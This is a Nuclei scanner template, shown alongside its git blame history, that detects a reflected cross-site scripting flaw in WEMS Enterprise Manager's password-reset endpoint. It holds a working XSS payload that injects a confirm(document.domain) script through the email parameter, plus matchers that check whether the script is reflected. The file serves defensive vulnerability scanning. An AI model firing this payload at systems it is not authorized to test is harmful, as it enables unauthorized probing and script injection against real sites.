nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml

id: wems-manager-xss

info:
  name: WEMS Enterprise Manager - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: WEMS Enterprise Manager contains a cross-site scripting vulnerability via the /guest/users/forgotten endpoint and the email parameter, which allows a remote attacker to inject arbitrary JavaScript into the response return by the server.
  reference:
    - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,packetstorm

requests:
  - method: GET
    path:
      - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '"><script>confirm(document.domain)</script>'
        part: body
      - type: word
        words:
          - "text/html"
        part: header

# Enhanced by mp on 2022/09/23
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`id: wems-manager-xss`

			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: WEMS Enterprise Manager - Cross-Site Scripting`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`author: pikpikcu`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`severity: high`
			`description: WEMS Enterprise Manager contains a cross-site scripting vulnerability via the /guest/users/forgotten endpoint and the email parameter, which allows a remote attacker to inject arbitrary JavaScript into the response return by the server.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Make references visible 2021-04-29 05:57:39 +00:00			`- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
			`cvss-score: 7.2`
			`cwe-id: CWE-79`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: xss,packetstorm`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00
			`requests:`
			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'`
Create wems-manager-xss.yaml 2020-08-30 05:40:09 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- '"><script>confirm(document.domain)</script>'`
			`part: body`
Adding content type checks for XSS templates 2020-12-13 19:24:23 +00:00			`- type: word`
			`words:`
			`- "text/html"`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`part: header`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00
			`# Enhanced by mp on 2022/09/23`